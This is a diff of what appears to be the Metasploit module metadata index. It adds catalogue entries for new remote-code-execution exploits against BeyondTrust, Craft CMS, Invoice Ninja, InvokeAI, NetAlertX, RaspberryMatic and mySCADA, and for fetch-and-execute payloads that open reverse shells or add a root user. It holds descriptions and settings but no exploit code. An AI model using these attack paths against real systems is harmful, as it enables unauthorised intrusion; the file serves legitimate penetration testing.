+    "description": "This exploit achieves unauthenticated remote code execution against BeyondTrust Privileged Remote\n          Access (PRA) and Remote Support (RS), with the privileges of the site user of the targeted BeyondTrust\n          product site. This exploit targets PRA and RS versions 24.3.1 and below.",
+    "references": [
+      "CVE-2024-12356",
+      "CVE-2025-1094",
+      "URL-https://www.beyondtrust.com/trust-center/security-advisories/bt24-10",
+      "URL-https://www.postgresql.org/support/security/CVE-2025-1094/",
+      "URL-https://attackerkb.com/topics/G5s8ZWAbYH/cve-2024-12356/rapid7-analysis"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Default"
+    ],
+    "mod_time": "2025-02-17 16:33:11 +0000",
+    "path": "/modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/beyondtrust_pra_rs_unauth_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/bitbucket_git_cmd_injection": {
    "name": "Bitbucket Git Command Injection",
    "fullname": "exploit/linux/http/bitbucket_git_cmd_injection",
@@ -71949,6 +72321,69 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_linux/http/craftcms_ftp_template": {
+    "name": "Craft CMS Twig Template Injection RCE via FTP Templates Path",
+    "fullname": "exploit/linux/http/craftcms_ftp_template",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-12-19",
+    "type": "exploit",
+    "author": [
+      "jheysel-r7",
+      "Valentin Lobstein",
+      "AssetNote"
+    ],
+    "description": "This module exploits a Twig template injection vulnerability in Craft CMS by abusing the --templatesPath argument.\n          The vulnerability allows arbitrary template loading via FTP, leading to Remote Code Execution (RCE).",
+    "references": [
+      "CVE-2024-56145",
+      "URL-https://github.com/Chocapikk/CVE-2024-56145",
+      "URL-https://www.assetnote.io/resources/research/how-an-obscure-php-footgun-led-to-rce-in-craft-cms"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix/Linux Command Shell"
+    ],
+    "mod_time": "2025-01-15 09:22:44 +0000",
+    "path": "/modules/exploits/linux/http/craftcms_ftp_template.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/craftcms_ftp_template",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/craftcms_unauth_rce_cve_2023_41892": {
    "name": "Craft CMS unauthenticated Remote Code Execution (RCE)",
    "fullname": "exploit/linux/http/craftcms_unauth_rce_cve_2023_41892",
@@ -75966,6 +76401,131 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/invoiceninja_unauth_rce_cve_2024_55555": {
+    "name": "Invoice Ninja unauthenticated PHP Deserialization Vulnerability",
+    "fullname": "exploit/linux/http/invoiceninja_unauth_rce_cve_2024_55555",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-12-13",
+    "type": "exploit",
+    "author": [
+      "h00die-gr3y <h00die.gr3y@gmail.com>",
+      "Rémi Matasse",
+      "Mickaël Benassouli"
+    ],
+    "description": "Invoice Ninja is a free invoicing software for small businesses, based on the PHP framework Laravel.\n          A Remote Code Execution vulnerability in Invoice Ninja (>= 5.8.22 <= 5.10.10) allows remote unauthenticated\n          attackers to conduct PHP deserialization attacks via endpoint `/route/<hash>` which accepts a Laravel\n          ciphered value which is unsafe unserialized, if an attacker has access to the APP_KEY.\n          As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands,\n          potentially resulting in complete system compromise, data exfiltration, or unauthorized access\n          to sensitive information.",
+    "references": [
+      "CVE-2024-55555",
+      "URL-https://attackerkb.com/topics/xxxxx/cve-2024-55555",
+      "URL-https://www.synacktiv.com/advisories/invoiceninja-unauthenticated-remote-command-execution-when-appkey-known"
+    ],
+    "platform": "Linux,PHP,Unix",
+    "arch": "php, cmd",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "PHP",
+      "Unix/Linux Command"
+    ],
+    "mod_time": "2025-02-24 15:51:32 +0000",
+    "path": "/modules/exploits/linux/http/invoiceninja_unauth_rce_cve_2024_55555.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/invoiceninja_unauth_rce_cve_2024_55555",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
+  "exploit_linux/http/invokeai_rce_cve_2024_12029": {
+    "name": "InvokeAI RCE",
+    "fullname": "exploit/linux/http/invokeai_rce_cve_2024_12029",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2025-02-07",
+    "type": "exploit",
+    "author": [
+      "jackfromeast",
+      "Takahiro Yokoyama"
+    ],
+    "description": "InvokeAI has a critical vulnerability leading to remote code execution in the /api/v2/models/install API through unsafe model deserialization.\n          The API allows users to specify a model URL, which is downloaded and loaded server-side using torch.load without proper validation.\n          This functionality allows attackers to embed malicious code in model files that execute upon loading.",
+    "references": [
+      "CVE-2024-12029",
+      "URL-https://huntr.com/bounties/9b790f94-1b1b-4071-bc27-78445d1a87a3"
+    ],
+    "platform": "Linux",
+    "arch": "",
+    "rport": 9090,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Linux Command"
+    ],
+    "mod_time": "2025-02-18 21:21:19 +0000",
+    "path": "/modules/exploits/linux/http/invokeai_rce_cve_2024_12029.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/invokeai_rce_cve_2024_12029",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/ipfire_bashbug_exec": {
    "name": "IPFire Bash Environment Variable Injection (Shellshock)",
    "fullname": "exploit/linux/http/ipfire_bashbug_exec",
@@ -79344,6 +79904,68 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_linux/http/netalertx_rce_cve_2024_46506": {
+    "name": "Unauthenticated RCE in NetAlertX",
+    "fullname": "exploit/linux/http/netalertx_rce_cve_2024_46506",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2025-01-30",
+    "type": "exploit",
+    "author": [
+      "Chebuya (Rhino Security Labs)",
+      "Takahiro Yokoyama"
+    ],
+    "description": "An attacker can update NetAlertX settings with no authentication, which results in RCE.",
+    "references": [
+      "CVE-2024-46506",
+      "URL-https://rhinosecuritylabs.com/research/cve-2024-46506-rce-in-netalertx/"
+    ],
+    "platform": "Linux",
+    "arch": "",
+    "rport": 20211,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Linux Command"
+    ],
+    "mod_time": "2025-02-11 11:25:24 +0000",
+    "path": "/modules/exploits/linux/http/netalertx_rce_cve_2024_46506.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/netalertx_rce_cve_2024_46506",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "config-changes",
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/netgear_dgn1000_setup_unauth_exec": {
    "name": "Netgear DGN1000 Setup.cgi Unauthenticated RCE",
    "fullname": "exploit/linux/http/netgear_dgn1000_setup_unauth_exec",
@@ -82392,6 +83014,70 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_linux/http/raspberrymatic_unauth_rce_cve_2024_24578": {
+    "name": "RaspberryMatic unauthenticated Remote Code Execution vulnerability through HMServer File Upload.",
+    "fullname": "exploit/linux/http/raspberrymatic_unauth_rce_cve_2024_24578",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-03-16",
+    "type": "exploit",
+    "author": [
+      "h00die-gr3y <h00die.gr3y@gmail.com>",
+      "h0ng10 <https://git.hub/h0ng10>"
+    ],
+    "description": "RaspberryMatic / OCCU contains a unauthenticated remote code execution (RCE) vulnerability, caused by multiple\n          issues within the Java based HMIPServer.jar component. The webui allows for Firmware uploads which can be reached\n          through the URL `/pages/jpages/system/DeviceFirmware/addFirmware`.\n          This allows an unauthenticated attacker to upload a malicious .tgz archive to the server, which will be\n          automatically extracted without any further checks. As this entry can contain ../sequences, it is possible to\n          break out of the predefined temp directory and write files to other locations outside this path.\n\n          This vulnerability is commonly known as the Zip Slip vulnerability and can be used to overwrite arbitrary files\n          on the main filesystem. It is therefore possible to overwrite the watchdog script with a malicious payload in\n          `/usr/local/addons/mediola/bin/`, which will be executed every five minutes through a cron job where attackers\n          can gain remote code execution as root user, allowing a full system compromise.\n\n          RaspberryMatic versions <= `3.73.9.20240130` are vulnerable.",
+    "references": [
+      "CVE-2024-24578",
+      "URL-https://attackerkb.com/topics/ywHhBnSObR/cve-2024-24578",
+      "URL-https://github.com/jens-maus/RaspberryMatic/security/advisories/GHSA-q967-q4j8-637h"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix/Linux Command"
+    ],
+    "mod_time": "2025-02-07 16:27:01 +0000",
+    "path": "/modules/exploits/linux/http/raspberrymatic_unauth_rce_cve_2024_24578.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/raspberrymatic_unauth_rce_cve_2024_24578",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session",
+        "event-dependent"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk",
+        "config-changes"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/ray_agent_job_rce": {
    "name": "Ray Agent Job RCE",
    "fullname": "exploit/linux/http/ray_agent_job_rce",
@@ -89186,7 +89872,7 @@
      "BINARY",
      "CMD"
    ],
-    "mod_time": "2023-12-01 16:06:48 +0000",
+    "mod_time": "2025-01-17 16:10:23 +0000",
    "path": "/modules/exploits/linux/local/docker_cgroup_escape.rb",
    "is_install_path": true,
    "ref_name": "linux/local/docker_cgroup_escape",
@@ -91027,7 +91713,7 @@
      "Dropper",
      "Command"
    ],
-    "mod_time": "2024-05-10 08:54:23 +0000",
+    "mod_time": "2025-02-20 08:19:23 +0000",
    "path": "/modules/exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.rb",
    "is_install_path": true,
    "ref_name": "linux/local/progress_kemp_loadmaster_sudo_privesc_2024",
@@ -92161,7 +92847,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2023-02-05 08:15:38 +0000",
+    "mod_time": "2025-01-22 17:06:48 +0000",
    "path": "/modules/exploits/linux/local/tomcat_ubuntu_log_init_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/tomcat_ubuntu_log_init_priv_esc",
@@ -92862,7 +93548,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2023-02-02 18:17:02 +0000",
+    "mod_time": "2025-01-17 16:10:23 +0000",
    "path": "/modules/exploits/linux/local/vmwgfx_fd_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/vmwgfx_fd_priv_esc",
@@ -109727,7 +110413,7 @@
    "description": "Nibbleblog contains a flaw that allows an authenticated remote\n          attacker to execute arbitrary PHP code. This module was\n          tested on version 4.0.3.",
    "references": [
      "CVE-2015-6967",
-      "URL-http://blog.curesec.com/article/blog/NibbleBlog-403-Code-Execution-47.html"
+      "URL-https://curesec.com/blog/article/blog/NibbleBlog-403-Code-Execution-47.html"
    ],
    "platform": "PHP",
    "arch": "php",
@@ -109750,7 +110436,7 @@
    "targets": [
      "Nibbleblog 4.0.3"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-01-26 19:20:12 +0000",
    "path": "/modules/exploits/multi/http/nibbleblog_file_upload.rb",
    "is_install_path": true,
    "ref_name": "multi/http/nibbleblog_file_upload",
@@ -192137,6 +192823,65 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/scada/mypro_mgr_cmd": {
+    "name": "mySCADA myPRO Manager Unauthenticated Command Injection (CVE-2024-47407)",
+    "fullname": "exploit/windows/scada/mypro_mgr_cmd",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-11-21",
+    "type": "exploit",
+    "author": [
+      "Michael Heinzl"
+    ],
+    "description": "Unauthenticated Command Injection in MyPRO Manager <= v1.2 from mySCADA.\n          The vulnerability can be exploited by a remote attacker to inject arbitrary operating system commands which will get executed in the context of the myscada9 administrative user that is automatically added by the product.",
+    "references": [
+      "URL-https://www.cisa.gov/news-events/ics-advisories/icsa-24-326-07",
+      "CVE-2024-47407"
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": 34022,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Windows_Fetch"
+    ],
+    "mod_time": "2025-01-29 20:18:05 +0000",
+    "path": "/modules/exploits/windows/scada/mypro_mgr_cmd.rb",
+    "is_install_path": true,
+    "ref_name": "windows/scada/mypro_mgr_cmd",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_windows/scada/procyon_core_server": {
    "name": "Procyon Core Server HMI Coreservice.exe Stack Buffer Overflow",
    "fullname": "exploit/windows/scada/procyon_core_server",
@@ -197426,7 +198171,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/singles/apple_ios/aarch64/shell_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/aarch64/shell_reverse_tcp",
@@ -198627,6 +199372,879 @@
    "payload_type": 1,
    "staged": false
  },
+  "payload_cmd/linux/http/aarch64/meterpreter/reverse_tcp": {
+    "name": "HTTP Fetch, Reverse TCP Stager",
+    "fullname": "payload/cmd/linux/http/aarch64/meterpreter/reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>"
+    ],
+    "description": "Fetch and execute an AARCH64 payload from an HTTP server.\nConnect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/aarch64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/aarch64/meterpreter/reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/aarch64",
+    "adapted_refname": "linux/aarch64/meterpreter/reverse_tcp",
+    "staged": true,
+    "stage_refname": "linux/aarch64/meterpreter",
+    "stager_refname": "linux/aarch64/reverse_tcp"
+  },
+  "payload_cmd/linux/http/aarch64/meterpreter_reverse_http": {
+    "name": "HTTP Fetch",
+    "fullname": "payload/cmd/linux/http/aarch64/meterpreter_reverse_http",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an AARCH64 payload from an HTTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/aarch64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/aarch64/meterpreter_reverse_http",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/aarch64",
+    "adapted_refname": "linux/aarch64/meterpreter_reverse_http",
+    "staged": false
+  },
+  "payload_cmd/linux/http/aarch64/meterpreter_reverse_https": {
+    "name": "HTTP Fetch",
+    "fullname": "payload/cmd/linux/http/aarch64/meterpreter_reverse_https",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an AARCH64 payload from an HTTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/aarch64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/aarch64/meterpreter_reverse_https",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/aarch64",
+    "adapted_refname": "linux/aarch64/meterpreter_reverse_https",
+    "staged": false
+  },
+  "payload_cmd/linux/http/aarch64/meterpreter_reverse_tcp": {
+    "name": "HTTP Fetch",
+    "fullname": "payload/cmd/linux/http/aarch64/meterpreter_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an AARCH64 payload from an HTTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/aarch64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/aarch64/meterpreter_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/aarch64",
+    "adapted_refname": "linux/aarch64/meterpreter_reverse_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/http/aarch64/shell/reverse_tcp": {
+    "name": "HTTP Fetch, Linux dup2 Command Shell, Reverse TCP Stager",
+    "fullname": "payload/cmd/linux/http/aarch64/shell/reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre"
+    ],
+    "description": "Fetch and execute an AARCH64 payload from an HTTP server.\ndup2 socket in x12, then execve.\n\nConnect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/aarch64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/aarch64/shell/reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/aarch64",
+    "adapted_refname": "linux/aarch64/shell/reverse_tcp",
+    "staged": true,
+    "stage_refname": "linux/aarch64/shell",
+    "stager_refname": "linux/aarch64/reverse_tcp"
+  },
+  "payload_cmd/linux/http/aarch64/shell_reverse_tcp": {
+    "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Inline",
+    "fullname": "payload/cmd/linux/http/aarch64/shell_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre"
+    ],
+    "description": "Fetch and execute an AARCH64 payload from an HTTP server.\nConnect back to attacker and spawn a command shell",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/aarch64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/aarch64/shell_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/aarch64",
+    "adapted_refname": "linux/aarch64/shell_reverse_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/http/armbe/meterpreter_reverse_http": {
+    "name": "HTTP Fetch",
+    "fullname": "payload/cmd/linux/http/armbe/meterpreter_reverse_http",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an ARMBE payload from an HTTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/armbe.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/armbe/meterpreter_reverse_http",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/armbe",
+    "adapted_refname": "linux/armbe/meterpreter_reverse_http",
+    "staged": false
+  },
+  "payload_cmd/linux/http/armbe/meterpreter_reverse_https": {
+    "name": "HTTP Fetch",
+    "fullname": "payload/cmd/linux/http/armbe/meterpreter_reverse_https",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an ARMBE payload from an HTTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/armbe.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/armbe/meterpreter_reverse_https",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/armbe",
+    "adapted_refname": "linux/armbe/meterpreter_reverse_https",
+    "staged": false
+  },
+  "payload_cmd/linux/http/armbe/meterpreter_reverse_tcp": {
+    "name": "HTTP Fetch",
+    "fullname": "payload/cmd/linux/http/armbe/meterpreter_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an ARMBE payload from an HTTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/armbe.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/armbe/meterpreter_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/armbe",
+    "adapted_refname": "linux/armbe/meterpreter_reverse_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/http/armbe/shell_bind_tcp": {
+    "name": "HTTP Fetch, Linux ARM Big Endian Command Shell, Bind TCP Inline",
+    "fullname": "payload/cmd/linux/http/armbe/shell_bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>"
+    ],
+    "description": "Fetch and execute an ARMBE payload from an HTTP server.\nListen for a connection and spawn a command shell",
+    "references": [
+      "URL-https://github.com/earthquake/shellcodes/blob/master/armeb_linux_ipv4_bind_tcp.s"
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/armbe.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/armbe/shell_bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/armbe",
+    "adapted_refname": "linux/armbe/shell_bind_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/http/armle/adduser": {
+    "name": "HTTP Fetch, Linux Add User",
+    "fullname": "payload/cmd/linux/http/armle/adduser",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Jonathan Salwan"
+    ],
+    "description": "Fetch and execute an ARMLE payload from an HTTP server.\nCreate a new user with UID 0",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/armle/adduser",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/armle",
+    "adapted_refname": "linux/armle/adduser",
+    "staged": false
+  },
+  "payload_cmd/linux/http/armle/exec": {
+    "name": "HTTP Fetch, Linux Execute Command",
+    "fullname": "payload/cmd/linux/http/armle/exec",
+    "aliases": [
+
+    ],
